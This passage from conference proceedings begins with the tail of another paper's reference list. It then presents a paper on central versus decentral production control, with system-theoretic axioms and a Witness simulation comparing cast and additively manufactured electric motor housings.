4. Hammami, I., Trabelsi, L.: Les Green IT au service de l’urbanisation des systèmes d’information pour une démarche écologiquement responsable. No. hal-02103494 (2013)
5. Guariglia, A., Liu, X., Song, L.: Internal finance and growth: microeconometric evidence on Chinese firms. J. Dev. Econ. 96(1), 79–94 (2011)
6. Parasuraman, A.: Technology Readiness Index (TRI): a multiple-item scale to measure readiness to embrace new technologies. J. Serv. Res. 2(4), 307–320 (2000)
7. Parasuraman, A., Colby, C.L.: Techno-Ready Marketing: How and Why Your Customers Adopt Technology. Free Press, New York (2001)
8. Demirci, A.E., Ersoy, N.F.: Technology readiness for innovative high-tech products: how consumers perceive and adopt new technologies. Bus. Rev. 11(1), 302–308 (2008)
9. Lucchetti, R., Sterlacchini, A.: The adoption of ICT among SMEs: evidence from an Italian survey. Small Bus. Econ. 23(2), 151–168 (2004)
10. Harindranath, G., Dyerson, R., Barnes, D.: ICT adoption and use in UK SMEs: a failure of initiatives? Electron. J. Inf. Syst. Eval. 11(2), 91–96 (2008)
11. Nugroho, M.A., et al.: Exploratory study of SMEs technology adoption readiness factors. Procedia Comput. Sci. 124, 329–336 (2017)
12. Ifinedo, P.: An empirical analysis of factors influencing Internet/e-business technologies adoption by SMEs in Canada. Int. J. Inf. Technol. Decis. Mak. 10(04), 731–766 (2011)
13. Beatty, R.C., Shim, J.P., Jones, M.C.: Factors influencing corporate web site adoption: a time-based assessment. Inf. Manag. 38(6), 337–354 (2001)
14. Dong, L.: Modelling top management influence on ES implementation. Bus. Process Manag. 7, 243–250 (2001)
15. Thong, J.Y.L., Yap, C.S.: CEO characteristics, organizational characteristics and information technology adoption in small businesses. Omega 23(4), 429–442 (1995)
16. Khalil, T.M.: Management of Technology: The Key to Competitiveness and Wealth Creation. McGraw-Hill Science, Engineering & Mathematics (2000)
17. Grandon, E.E., Pearson, J.M.: Electronic commerce adoption: an empirical study of small and medium US businesses. Inf. Manag. 42(1), 197–216 (2004)
18. Tung, L.L., Rieck, O.: Adoption of electronic government services among business organizations in Singapore. J. Strat. Inf. Syst. 14(4), 417–440 (2005)
19. Naushad, M., Sulphey, M.M.: Prioritizing technology adoption dynamics among SMEs. TEM J. 9(3), 983 (2020)
20. Shaikh, A.A., et al.: A two-decade literature review on challenges faced by SMEs in technology adoption. Acad. Mark. Stud. J. 25(3) (2021)
21. Kossaï, M., de Souza, M.L.L., Zaied, Y.B., Nguyen, P.: Determinants of the adoption of information and communication technologies (ICTs): the case of Tunisian electrical and electronics sector. J. Knowl. Econ. 11(3), 845–864 (2019). https://doi.org/10.1007/s13132-018-0573-6
22. Yin, R.K.: Design and methods. Case Study Res. 3(92), 1–9 (2003)
23. Yin, R.K.: Case Study Research: Design and Methods, vol. 5. Sage, Thousand Oaks (2009)
Aspects of the Central and Decentral Production Parameter Space, its Meta-Order and Industrial Application Simulation Example
Bernhard Heiden1,2(B), Ronja Krimm1, Bianca Tonino-Heiden2, and Volodymyr Alieksieiev3
1 Carinthia University of Applied Sciences, 9524 Villach, Austria [email protected]
2 University of Graz, 8010 Graz, Austria
3 Faculty of Mechanical Engineering, Leibniz University Hannover, An der Universität 1, Garbsen, Germany
http://www.cuas.at
Abstract. In this paper, after giving an overview of this research field, we investigate the central-decentral parameter space using a theoretical approach, including a cybernetic meta-order concerning system-theoretic concepts. For this, we introduce an axiom system with four axioms describing production systems in general: the modeling axiom and three axioms for system states, namely the attractor, bottleneck, and diversity theorems, all describing complex ordered systems. We then make a numerical investigation of central and decentral production in conjunction with a practical industrial application example and compare it to previous simulation results. As a result, we recommend simulating production with respect to these two possibilities, central and decentral, in the production control parameter space, together with additional production parameters such as the customer and the product quantity, in order to produce optimally for each specific case.
Keywords: Orgiton theory · Graph theory · Witness · Central · Decentral · Production · Manufacturing · Logistics · System theory · Cybernetics · Decentral control · Heterarchical systems · Additive manufacturing · AM
1 Introduction
In production, the general question of optimal production arises. Future trends like Industry 4.0 (see, e.g. [1]) tend to make production more flexible and include more and more sophisticated automation. This new trend of automation, and of the automation of automation, can be regarded as an approximation of what we understand today as Artificial Intelligence (AI). In this context, production control becomes increasingly important: because of flexibility arrangements and possibilities, and the need for production efficiency, new strategies may have to be implemented that were not technologically feasible up to now, as, e.g., the arising paradigm of Additive Manufacturing (AM) (see, e.g. [8]) changes production in principle. This is closely linked to the newly arising osmotic paradigm, which is inclined towards decentrality, as decentrality increases ecological properties like resilient and overall efficient production, which are generally known to result from diversity, autonomy and heterarchy (cf. e.g. [13,26]). In this context it can be seen that production technologies like AM and Computer Numerical Controlled (CNC) machines in general allow for emergent features like flexible, personalized and decentral production as a consequence of their basic process structure. The hypothesis is therefore that new production methods are more apt to fulfill current requirements like the diversity of products or the diversity of customer buying decisions, to mention only two. The essential point in personalization and flexibilization is whether it makes sense from the point of view of efficiency in a modern production environment, and how to achieve it with central or decentral strategies. Up to now, the central paradigm was unquestioned, but as it reaches its limit, we have to ask where, when and how it makes sense from specific points of view.
The problem of central-decentral control is well known in general and is the only classification type for production and production control that we focus on here. It relates to general properties that we can find in networks (e.g., [30]) or graph theory (see, e.g., [4]), where a lot of research has been done. For example, according to Watts and Strogatz, some networks have the now famous “small world” properties, which means that even very sparse networks are effectively cross-linked, similar to a dense net. Graph-theoretical approaches, on the other hand, allow algorithms to be applied. Still, because of their computational implementation, they may not be easy to argue with or to understand. Therefore, our strategy in this work is to find general argumentation strategies that we then test in more detail for their validity with simulation models. Other recent approaches to the arising decentral paradigm are the holonic manufacturing approach, heterarchical systems, distributed control and multi-agent systems (cf. also [27]), which can, for example, be implemented straightforwardly in the program Anylogic¹. This kind of often neglected research becomes necessary in an environment of increasingly dense nets of material and informational processes. The reason is that, in this particular case of a complex system, and generally in nonlinear systems, new and unpredicted system behavior is to be expected (cf. e.g. [14]) and has to be investigated to make a difference in the efficiency of such production processes.
Content. In this paper, after presenting the research goal, question, method and limitations, we give in Sect. 2 the meta-description of the central-decentral production parameter space. In Sect. 3 we introduce and discuss the Witness model used. In Sect. 4 we conclude with open and promising research questions in the field.
¹ https://www.anylogic.de/.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 297–309, 2023. https://doi.org/10.1007/978-3-031-28073-3_21
Goal and Research Question. The goal of this paper is to investigate further the properties of production in the parameter space of central and decentral production. The research question is: Which parameters influence production, focusing on the bi-valued discrimination in the parameter space of central-decentral production, and which control method should be preferred under which conditions?
Research Method. This research paper analyzes the research question and gives, in Sect. 2, a natural-language axiomatization for the research focus and thesis. Section 3 explores the topic with a Witness simulation example of an industrial production problem and relates it to the given axiomatization. In doing so, we use a modern cybernetic knowledge process approach (see e.g. [25,29]).
Limitations. The limitation of this work is that the simulation model is computed only at a limited complexity, and that the problem is restricted, theoretically and practically, to only a few production parameters. Hence other parameters might also be necessary. Another significant limitation is the bi-valued discrimination of central-decentral models, which could be overcome in future research by more sophisticated models and/or by a transition model for a seamless transition in the central-decentral parameter space. In particular, this would require defining a complex variable that mediates between the two extremes. An interesting and promising approach in this regard is found in [6], where a typology of transition in the central-decentral parameter space is given in the form of specific networks, which we plan to investigate in the future.
2 Metadescriptive Approach in Orgitonal Terms of the Central-Decentral Problem
When we look at the central-decentral parameter space, we can formulate the following meta-descriptive system properties, which we will test and confirm later in more detail. As the first axiom we formulate the modeling theorem, which allows for an overall modeling of the production process by a digital twin:
Axiom 1. The production can be divided into an information and a material production line, which are both (a) decoupled with respect to time/space and (b) structurally coupled to each other and the environment.
According to orgiton and systems theory (see also [12,28]), the information process is of potentially higher order and structurally coupled with the material process, which we can also call the attractor theorem:
Axiom 2. Information and material processes have an attractor according to their order and can hence dominate or limit the process.
Therefore, the dominating process limits efficiency. For a further explanation of the attractors related to the growth process, see also our recent investigation of growth processes [11]. This can be understood as the bottleneck theorem:
Axiom 3. Production can be regarded as a growth process under limitations. Optimal production is at the overall dominating limit.
How diversity creates approximate optimality can be expressed by the following diversity theorem:
Axiom 4. The central-decentral parameter space in production integrates production parameters into overall production efficiency.
This axiom relates to, or constitutes, the hypothesis that in the lockstepping region of a growth process, an order can emerge through an arising osmotic diversity. Hence, combinatorial arrangements allow for continuing or autopoietic evolution processes, due to, e.g., the property of self-similarity.
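Axioms 2 and 3 can be illustrated with a deliberately simple sketch. It assumes, as a simplification that is not part of the axiom system itself, that the information line and the material line are each a chain of stations with a fixed capacity, that the throughput of a chain is set by its slowest station, and that the coupled production is limited by the slower of the two lines. All station names and rates are hypothetical and are not taken from the Witness model.

```python
def line_bottleneck(capacities: dict) -> tuple:
    """Return (station, rate) of the slowest station in one production line."""
    if not capacities:
        raise ValueError("a line needs at least one station")
    station = min(capacities, key=capacities.get)
    return station, capacities[station]


def production_limit(information: dict, material: dict) -> tuple:
    """Return (line, station, rate) of the limit that dominates the coupled system."""
    info_station, info_rate = line_bottleneck(information)
    mat_station, mat_rate = line_bottleneck(material)
    # The structurally coupled system cannot run faster than its slower line.
    if info_rate <= mat_rate:
        return "information", info_station, info_rate
    return "material", mat_station, mat_rate


if __name__ == "__main__":
    # Hypothetical capacities in parts per hour.
    information = {"order_processing": 12.0, "scheduling": 9.0}
    material = {"printing": 4.0, "post_processing": 6.0}
    print(production_limit(information, material))
```

In this reading, raising the capacity of any station other than the dominating one leaves the overall throughput unchanged, which is one way to interpret the statement that optimal production lies at the overall dominating limit.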
3 Model in Witness and Comparison to Previous Approach
The following use case serves as a concrete example that demonstrates, in a practical context, the problem covered in [18]. One factor that changes production systems more than others is the technology with which the products are manufactured. One technological advancement of great impact is Additive Manufacturing (AM), also known as 3D-Printing. It is not only a different approach to how materials are processed, compared to conventional manufacturing, but it also makes a different structuring of production systems possible. Therefore, the manufacturing of electric motor housings with AM and with traditional processes will be used as an example to simulate the different production and production control systems. In the next subsections, a short summary of both manufacturing processes will be given, and it will be explained how they relate to the production of the electric motor housing. The findings will then be used to create the simulation of the use case in the production simulation software Witness [19].
3.1 Traditional and Additive Manufacturing (AM)
In short, as its name implies, AM adds layer upon layer of a certain material in a desired geometric shape in order to “grow” a three-dimensional object that was defined beforehand by Computer Aided Design (CAD) software or 3D object scanners (see, e.g. [8] and [2]). There are various AM processes, including powder bed fusion, binder jetting, directed energy deposition, and material extrusion. Not every technology can process every material. Materials that AM technologies can generally process are metals, thermoplastics, and ceramics [7].
Central Decentral Meta-Order and Application Example
Traditional manufacturing processes, by contrast, are solidification processes like casting or molding, deformation processes like forging or pressing, subtractive processes like milling, drilling, or machining and, last but not least, joining processes like welding, brazing, and soldering [22]. Some of these techniques are hundreds of years old but are still used in an adapted and optimized way.
3.2 Electric Motor Housing as Application Example for the Case Study
Kampker describes in [16] the classical production of an electric motor housing in great detail, as he counts it as one of the essential parts of the motor because it protects its active machine parts. Three steps are needed to manufacture the housing. First, the shape is cast; different casting methods are available, depending primarily on the number of units that must be produced. The second step is machining, such as deburring, milling, or drilling, to ensure that all form and surface requirements are met. The last step is cleaning the workpiece to ensure a smooth assembly.
One problem with motors, independent of their type (combustion engine or electric motor), is that they have to be cooled in order to work correctly. There are several solutions for heat removal in electric motors. Traditionally, an electric motor has a liquid cooling system, meaning that a liquid is pumped through assorted hoses and the heat is rejected through a radiator [15]. This system is effective, but it adds difficulties to the design and production of the housing because cooling lines have to be added, resulting in a complex manufacturing process containing not just the housing but several parts combined into one module.
The German company PARARE GmbH specializes in selective metal laser melting and has developed, together with the Karlsruhe Institute of Technology, an electric motor housing with an integrated cooling channel, as depicted in [24]. Due to the freedom of geometry, AM opens up possibilities to reduce the number of parts in a module and thereby also assembly costs. However, a disadvantage of AM is that simple components or standard parts are already “cheap” to manufacture, and they do not become cheaper through AM. The highest potential of AM hence lies in the performance enhancement of parts and in lightweight construction, especially for metals, as well as in small-scale production and individualization. The reason is that production cost and time stay the same whether the same part is produced n times or n different parts are produced. The design effort increases, of course, if a product is optimized for the requirements of a customer [23].
The production of an electric motor housing with a liquid cooling system will serve as the use case in order to simulate a central and a decentral production control system, where the decentral production system works with AM and the central production system works with the traditional manufacturing of the said product.
3.3 Simulation of the Case Study in Witness
The first simulation in Fig. 1 (a) shows the central production control, where the parts are pushed through the manufacturing process. As described above, the housing is first cast, then machined, and then cleaned. Finally, before the housing is put into stock, it is assembled with the cooling pipes. In order to keep the simulation as compact as possible, the manufacturing of the other module parts is not shown, but their process time is integrated into the process step “Assembly”.
[Figure 1. Panel (a), central control: material flow Casting, Machining, Cleaning, Assembly, Stock, SHIP, with SCRAP outputs; information layer with Casting, Machining, Cleaning, and Assembly Information, Central Instance-1 to Central Instance-5, Orders, and Customer order information; environment border. Panel (b), decentral control: material flow Preparing-printer, Printing, Post-processing, Inventory, SHIP, with a SCRAP output; information layer with Preparing-printer, Printing, Post-processing, Orders, and Customer-order Information; environment border.]
Fig. 1. Central (a) and decentral (b) production control system as Witness model [18]. The chain-dotted line indicates the system border of information and material processes. The up and down arrows ↑↓ indicate the meta-information exchange between material and informational processes. The left and right arrows ← → indicate the material and informational flows from and towards the environment, that is, their direction relative to the border line that delimits cases (a) and (b). The model can be regarded as an implementation of the overall process structure given in Axiom 1.
The second simulation in Fig. 1 (b) shows the decentral production control system, where the parts are pulled through the manufacturing process. It consists of the following steps: first, the printer and the print job need to be prepared; the second step is the printing itself; and the last step is the post-processing, after which the part is put into the inventory and eventually shipped to the customer.
In order to show the differences between the production methods and control systems, two scenarios are calculated: one in which a customer orders ten housings of a known type, and another in which a customer orders two parts that are slightly differing prototypes.
Scenario 1. The die casting process is a very fast production method, as the metal, in this case probably an aluminum alloy, is injected into the mold within fractions of a second and, depending on the wall thickness of the casting, cools in up to seven seconds. The longest part of the casting time is the die retention time of up to 30 s [5]. Provided that the molds for the desired product already exist, this manufacturing method is highly productive. Furthermore, it is assumed that only one mold for this product is used. The process steps, in this case, are (1) Preparation (only once for all parts), (2) Casting, (3) Machining, (4) Cleaning and (5) Assembly:
\[
\begin{aligned}
\text{Production time per part} &= (1) + (2) + (3) + (4) + (5) \\
&= \frac{60\,[\text{min}]}{10} + 1\,[\text{min}] + 15\,[\text{min}] + 1\,[\text{min}] + 60\,[\text{min}] \\
&= 83\,[\text{min}]
\end{aligned}
\tag{1}
\]
In order to calculate the total production time, the times of each process step are added, which results in 83 min for one part to be finished if the preparation time is evenly distributed over all parts. According to this model, it would take 830 min, or nearly 14 h, to produce 10 electric motor housings.
AM, on the other hand, needs more time for production. The company Parare uses a printer that works with several lasers and can print four housings simultaneously. In order to print 10 housings, the printer needs to be prepared three times, and each part needs 10 min of post-processing. Printing four parts simultaneously takes 1440 min or 24 h. Printing the remaining two parts, after two runs of four housings each, is assumed to still take two thirds of that time, i.e. 960 min. The process steps (1) Preparing the printer, (2a) Printing the first eight parts, (2b) Printing the last two parts simultaneously and (3) Post-processing then add up to:
\[
\begin{aligned}
\text{Total production time} &= (1) + (2a) + (2b) + (3) \\
&= 3 \cdot 5\,[\text{min}] + 2 \cdot 1440\,[\text{min}] + 960\,[\text{min}] + 10 \cdot 10\,[\text{min}] \\
&= 3955\,[\text{min}] \approx 66\,[\text{h}]
\end{aligned}
\tag{2}
\]
Total production time adds up to about 66 h, meaning that it would take nearly three days to print all 10 electric motor housings.
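The arithmetic of Scenario 1 can be retraced with a few lines of Python. This is a minimal sketch and not the Witness model: all function and constant names are illustrative assumptions, the step times are those quoted in the text, and the print time of a partially filled job is only known for the two-housing case stated above, so other remainders are rejected.

```python
import math

# Step times in minutes, as quoted in the text for Scenario 1.
CASTING_STEPS = {"casting": 1, "machining": 15, "cleaning": 1, "assembly": 60}
MOLD_PREPARATION = 60      # done once for the whole order

PRINTER_CAPACITY = 4       # housings per print job
PRINTER_PREPARATION = 5    # per print job
FULL_PRINT_JOB = 1440      # four housings at once
PARTIAL_PRINT_JOB = 960    # two housings, two thirds of a full job (text assumption)
POST_PROCESSING = 10       # per housing


def central_total(parts: int) -> float:
    """Eq. (1): preparation spread evenly over all parts, steps added per part."""
    per_part = MOLD_PREPARATION / parts + sum(CASTING_STEPS.values())
    return per_part * parts


def decentral_total(parts: int) -> int:
    """Eq. (2): print jobs run one after another on a single printer."""
    jobs = math.ceil(parts / PRINTER_CAPACITY)
    full_jobs, remainder = divmod(parts, PRINTER_CAPACITY)
    if remainder not in (0, 2):
        raise ValueError("the text only gives print times for 2 or 4 housings")
    printing = full_jobs * FULL_PRINT_JOB + (PARTIAL_PRINT_JOB if remainder else 0)
    return jobs * PRINTER_PREPARATION + printing + parts * POST_PROCESSING


if __name__ == "__main__":
    print(central_total(10))    # 830.0
    print(decentral_total(10))  # 3955
```

Keeping the step times in named constants makes it easy to see which quantity drives each total: assembly in the casting line, and the print job duration in the AM line.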
Scenario 2. In this scenario, we consider how long it takes each production method to produce two slightly different and completely new designs of an electric motor housing. Each design is to be produced only once. Die casting is a procedure that is only used for producing high quantities, as a lot of effort and investment is needed to create the new dies. For a scenario like this, sand casting is a better option because it is cheaper and faster. Moreover, for sand casting, a new sand mold is created for each part [3]. With two separate designs that need to be cast, total production time adds up according to the process steps (1) Preparation (of one sand mold), (2) Casting, (3) Machining, (4) Cleaning and (5) Assembly to:
\[
\begin{aligned}
\text{Total production time} &= (1) + (2) + (3) + (4) + (5) \\
&= 2 \cdot 2880\,[\text{min}] + 2 \cdot 5\,[\text{min}] + 2 \cdot 20\,[\text{min}] + 2 \cdot 1\,[\text{min}] + 2 \cdot 60\,[\text{min}] \\
&= 5932\,[\text{min}] \approx 99\,[\text{h}]
\end{aligned}
\tag{3}
\]
Using sand casting, it would take over four days to produce the prototypes. AM is known for its potential and proven performance in rapid prototyping on a high-quality level. The following times can be assumed for the process steps (1) 3D-Modeling (of both parts), (2) Preparing Printer, (3) Printing two parts simultaneously, and (4) Post-processing (for each part), using AM, and the total production time adds up, in the same order, to:
\[
\begin{aligned}
\text{Total production time} &= (1) + (2) + (3) + (4) \\
&= 360\,[\text{min}] + 5\,[\text{min}] + 960\,[\text{min}] + 2 \cdot 10\,[\text{min}] \\
&= 1345\,[\text{min}] \approx 22.4\,[\text{h}]
\end{aligned}
\tag{4}
\]
This technology makes it possible to manufacture two different parts within the time span of a day. Furthermore, it has to be mentioned that there is a difference in product performance that is not accounted for in the given simulation, as it does not have an inherent relationship with production time or cost in this case: the printed housing cools the motor more efficiently, it saves space because the part is smaller, and it saves weight compared to the traditionally produced housing [24].
3.4 Comparison to Previous Work
In order to further the discussion about central versus decentral control systems, the results given above are compared with the results found by Knabe (see [17] and also [10]). His simulation aimed at a more abstract representation of the different control systems without implementing realistic production processes. Another difference is that this work does not look at one fixed period of time, as Knabe does with 1440 min (one day), but at the time it takes the system to satisfy the customer demand. Therefore, there are large differences between the results of Knabe’s work and those of this paper, but also significant similarities.
One of the most important and also expected similarities is the complexity of the central production control model. There are constant connections between the central instance and every single process step, which are needed to provide the central instance with the information required to make decisions. He has also found that the length of the communication channels and the frequency of the information exchange influence the productivity of the systems [17]. The results of this paper do not reflect this, as the productivity of the machines was not measured, although this could be measured in a follow-up. Again, both decentral system models are similar, as the production control is not as complex, with regard to information flow, as in a centrally organized system. Parts are only produced if they are actually demanded, which in his case results in varying productivity of the machines. The 3D-Printing process, in this case, always works to capacity until all desired parts are produced. Regarding productivity, no meaningful comparison can therefore be made at this point.
He concludes his thesis by saying that the demand or, more specifically, the number [#] and timing of the product orders play a significant role in the choice of the production control system [17]. Looking at the results obtained in this paper, one can add that the possible variants of a product and the “art of manufacturing” also play an important role in this choice.
So concerning Table 1, which is ordered with regard to central and decentral, our simulation shows that central and decentral can have good or bad results, respectively, for the specific scenario case.
Table 1. Summary of the scenarios of this work
Scenarios              Parts produced   Variants   Total production time
Scenario 1 central     10               1          830 [min] ≈ 14 [h]
Scenario 1 decentral   10               1          3955 [min] ≈ 3 [d]
Scenario 2 central     2                2          5932 [min] ≈ 4 [d]
Scenario 2 decentral   2                2          1345 [min] ≈ 1 [d]
Although this case study uses only a limited variation of factors, namely (1) parts number [#], (2) product variants, and (3) a rough structural configuration for the process control in the parameter space central-decentral, it hence seems preferable, in general, to allocate production dynamically as a function of these factors in order to produce in a resource-optimal way.
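How such an allocation could look in code is sketched below, assuming the only inputs are the step times of Eqs. (1)-(4). The dictionary layout and the function `preferred_control` are hypothetical names introduced for illustration, and the selection criterion (shortest total production time) is a simplification that ignores cost and product performance.

```python
# Total production times in minutes, rebuilt from the step times of Eqs. (1)-(4).
SCENARIOS = {
    ("Scenario 1", "central"): 10 * (60 / 10 + 1 + 15 + 1 + 60),    # die casting
    ("Scenario 1", "decentral"): 3 * 5 + 2 * 1440 + 960 + 10 * 10,  # AM, three print jobs
    ("Scenario 2", "central"): 2 * (2880 + 5 + 20 + 1 + 60),        # sand casting
    ("Scenario 2", "decentral"): 360 + 5 + 960 + 2 * 10,            # AM, one print job
}


def preferred_control(scenario: str) -> str:
    """Return the control method with the shortest total production time."""
    candidates = {
        control: minutes
        for (name, control), minutes in SCENARIOS.items()
        if name == scenario
    }
    if not candidates:
        raise KeyError(f"unknown scenario: {scenario}")
    return min(candidates, key=candidates.get)


if __name__ == "__main__":
    for (name, control), minutes in SCENARIOS.items():
        print(f"{name:<10} {control:<9} {minutes:6.0f} min  {minutes / 60:5.1f} h")
    for name in ("Scenario 1", "Scenario 2"):
        print(name, "->", preferred_control(name))
```

With the values of Table 1, the sketch selects central control for Scenario 1 and decentral control for Scenario 2; a real allocation rule would need further criteria beyond production time.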
3.5 Discussion
ad Axiom 1. According to Axiom 1, the system is decoupled into information and material processes. There can be dynamic switching between information-limited and material-limited processes. This is where different production techniques come in. AM, as in the example, is limited with regard to processing time. A central processing unit fixes this, and the result is an information-centered, material-limited process. On the other hand, AM makes it possible to produce in one automated process and to quickly change the information set-up for personalization, owing to the intrinsic cybernetic process. The complexity is hidden behind the fast computation, which allows for efficient decentralization and hence also for variation in product demand. This is another kind of decentralization, here concerning consumer demand: production demand is spread out over time, which makes it a time-decentral process, as opposed to the space-decentral process that is commonly meant, also in this paper. Axiom 1 can serve as the modeling structure. Information and material processes are separated, and their interrelatedness can be sketched as with the arrows in Fig. 1. With regard to the Witness implementation, the simulation strategy is to construct a continuous material flow; we have constructed the information flow in the same manner, as an aid to understanding.
ad Axiom 2. When we compare Table 1 and the simulation results of this work with those of Knabe, it can be concluded that variation in the number of parts is only one parameter in a multivariate optimization problem for production. According to Axiom 2, this can be interpreted as the limiting bottleneck that grows as the system’s flexibility increases. The amount of flexibility depends on parameters that increase complexity, like personalization, distribution, decentral production and others.
ad Axiom 3. With regard to Axiom 3, the optimum production can be different, both central and decentral. The production parameters are (a) nonlinearly coupled, and there are (b) different levels of higher-order combinations of central-decentral system interaction, or respectively a multiversity of a combinatorial multi-bi-variate parameter space of the category central and decentral (see also [9,11]). The results in the previous sections support this and lead to the recommendation to always optimize production case-specifically, e.g. with a production simulation process.
ad Axiom 4. With regard to Axiom 4, it can be said that the necessary integration can be seen by means of the simulation, as parameters can be varied here, and in this way the optimal production scenario can be determined as a function of the actual production or producer state and the consumer need. Especially with regard to optimal structures, it becomes apparent that we have static and dynamic variants for optimization, and each has different advantages. In any case, the dynamic reallocation of resources, which generally corresponds to the increasing need for flexibilization of production, seems to become more favorable concerning optimal results in denser network configurations.
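The bottleneck reading of Axioms 2 and 3 can be made concrete with the die-casting line of Scenario 1. The sketch below is an illustration under assumptions that are not part of the Witness model: each step is a single machine, parts may wait between steps without limit, and steps may overlap on different parts, which Eq. (1) does not assume. The function name `flow_line_makespan` is hypothetical.

```python
def flow_line_makespan(step_times, parts, setup=0):
    """Completion time of the last part on a serial line with overlapping steps.

    A part can start a step once it has left the previous step and the
    step has released the previous part.
    """
    finished = [setup] * len(step_times)  # finish time of the latest part per step
    for _ in range(parts):
        ready = setup                     # all parts are available after the setup
        for i, duration in enumerate(step_times):
            start = max(ready, finished[i])
            finished[i] = start + duration
            ready = finished[i]
    return finished[-1]


steps = {"casting": 1, "machining": 15, "cleaning": 1, "assembly": 60}  # minutes
bottleneck = max(steps, key=steps.get)
overlapped = flow_line_makespan(list(steps.values()), parts=10, setup=60)
serial = 60 + 10 * sum(steps.values())    # Eq. (1): no overlap between parts

print(bottleneck)  # assembly
print(serial)      # 830
print(overlapped)  # 677
```

Under these assumptions the assembly step dominates: every additional part adds 60 min to the total, so shortening any other step would barely change the result.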
4 Conclusion and Outlook
In our study, we have first formulated four axioms that guide the central-decentral parameter space with respect to orgiton and general system theory. Axiom 1 is the basis for modeling a production system with regard to material and information flows. Axioms 2-4 describe general properties of production system operation. Axiom 2, the attractor theorem, states that there will be, in a given configuration, a quasi-stationary state of operation. Axiom 3 then formulates a possible switching of attractors under certain circumstances. Axiom 4 finally states possible optimal operation in diverse attractor environments, or multivariate dependent systems. The reason may be similar to that of Portfolio theory [21], namely nonlinear statistical system properties. Whereas in Portfolio theory the “overall system” is the market, in our theory or axiom system it is the multivariate production system.
We have then taken a small step toward understanding how optimal production can take place under varying parameters of (1) parts number [#], (2) product variants and (3) the parameter space of dynamic process control in its discrete ends central-decentral, through an industrial production application example. In the subsequent discussion, we have reasoned that the given axioms, which define the overall order structure of the presented research problem, are mirrored in the simulation results and the overall applicable production strategy. We have found that a real-time, case-specific simulation is a good way to screen for optimal production possibilities. One reason for this is that (3) is a factor of overall factory organization, which is deeply connected to the structural arrangement of the factory, that is, the types of production devices and the specific production process sequence organizations and their types of operations.
Regarding systems theory, this affects autopoiesis, or the cybernetics of processes, the process of the process, and self-organization, or the organization of the organization of structures or machines. Both specifics are peculiarities of Industry 4.0 and hence important for the future factory. Finally, factors (1) and (2) depend deeply on society, production and human environment, and product demand, or the personal dimension of the market, or the market of one person. This other end of market diversification is captured by the important principle of personalization of production, which is also an essential part of Industry 4.0 and of the further developed cybernetic production paradigms that follow it.
In future work, we will focus on the following themes, which colleagues are also invited to investigate as open questions: (a) How can we shape or discover new patterns with further simulations of these types with regard to general properties of specific production schemes, which are gradually different in the parameter space central-decentral? (b) What are, in any case, interesting influence parameters in the simulation process? (c) How will we transform production systems into self-organizational and even autopoietic systems? Last but not least, (d) the system-theoretic debate on whether optimization can be neglected if autopoiesis is achieved (see here also [20, p. 172]), and which applications this has in production systems, will be of striking interest.
References
1. Bauernhansl, T., ten Hompel, M., Vogel-Heuser, B. (eds.): Industrie 4.0 in Produktion, Automatisierung und Logistik. Springer, Wiesbaden (2014). https://doi.org/10.1007/978-3-658-04682-8
2. Burkhard, H.: Industrial production manufacturing processes, measuring and testing technology, original in German: Industrielle Fertigung Fertigungsverfahren, Mess- und Prüftechnik. Haan-Gruiten: Verlag Europa-Lehrmittel, 6 edn. (2013)
3. Cavallo, C.: Die casting vs. sand casting - what’s the difference? Thomas-Company. https://www.thomasnet.com/articles/custom-manufacturing-fabricating/diecasting-vs-sand-casting/, 1 July 2022
4. Dasgupta, S., Papadimitriou, C., Vazirani, U.: Algorithms. The McGraw-Hill Companies (2008)
5. DCM. The time control of die casting process. Junying Metal Manufacturing Co., Limited. https://www.diecasting-mould.com/news/the-time-control-of-diecasting-process-diecasting-mould, 1 July 2022
6. Fadhlillah, M.M.: Pull system vs push system. http://famora.blogspot.com/2009/11/pull-system-vs-push-system.html, 1 July 2022
7. GE-Additive. http://famora.blogspot.com/2009/11/pull-system-vs-push-system.html, 1 July 2022
8. Gibson, I., Rosen, D., Stucker, B.: Additive Manufacturing Technologies. Springer, New York (2015). https://doi.org/10.1007/978-1-4939-2113-3
9. Heiden, B., Alieksieiev, V., Tonino-Heiden, B.: Selforganisational high efficient stable chaos patterns. In: Proceedings of the 6th International Conference on Internet of Things, Big Data and Security - Volume 1: IoTBDS, pp. 245–252. INSTICC, SciTePress (2021). https://doi.org/10.5220/0010465502450252
10. Heiden, B., Knabe, T., Alieksieiev, V., Tonino-Heiden, B.: Production orgitonization - some principles of the central/decentral dichotomy and a witness application example. In: Arai, K. (ed.) FICC 2022. vol. 439, pp. 517–529. Springer, Cham (2022). https://doi.org/10.1007/978-3-030-98015-3_36
11. Heiden, B., Tonino-Heiden, B.: Lockstepping conditions of growth processes: some considerations towards their quantitative and qualitative nature from investigations of the logistic curve. In: Arai, K. (ed.) Intelligent Systems and Applications. IntelliSys 2022. Lecture Notes in Networks and Systems, vol. 543. Springer, Cham (2023). https://doi.org/10.1007/978-3-031-16078-3_48
12. Heiden, B., Tonino-Heiden, B.: Philosophical Studies - Special Orgiton Theory/Philosophische Untersuchungen - Spezielle Orgitontheorie (English and German Edition) (unpublished) (2022)
13. Heiden, B., Volk, M., Alieksieiev, V., Tonino-Heiden, B.: Framing artificial intelligence (AI) additive manufacturing (AM). Procedia Comput. Sci. 186, 387–394 (2021). https://doi.org/10.1016/j.procs.2021.04.161
14. Hilborn, R.C.: Chaos and Nonlinear Dynamics - An Introduction for Scientists and Engineers. Oxford University Press, New York (1994)
15. Huang, J., et al.: A hybrid electric vehicle motor cooling system–design, model, and control. IEEE Trans. Veh. Technol. 68(5), 4467–4478 (2019)
16. Kampker, A.: Elektromobilproduktion. Springer, Heidelberg (2014). https://doi.org/10.1007/978-3-642-42022-1
17. Knabe, T.: Centralized vs. decentralized control of production systems (original in German: Zentrale vs. dezentrale Steuerung von Produktionssystemen), bachelor’s thesis, Carinthia University of Applied Sciences, Austria (2021)
18. Krimm, R.: Comparison of central and decentral production control systems and simulation of an industrial use case, bachelor’s thesis, Carinthia University of Applied Sciences, Villach, Austria (2022)
19. Lanner. Technology witness horizon (2021)
20. Luhmann, N.: Einführung in die Systemtheorie, 3 edn. Carl-Auer-Systeme Verlag (2006)
21. Markowitz, H.M.: Portfolio selection. J. Financ. 7(1), 77–91 (1952)
22. Pan, Y., et al.: Taxonomies for reasoning about cyber-physical attacks in IoT-based manufacturing systems 4(3):45–54 (2017). https://doi.org/10.9781/ijimai.2017.437
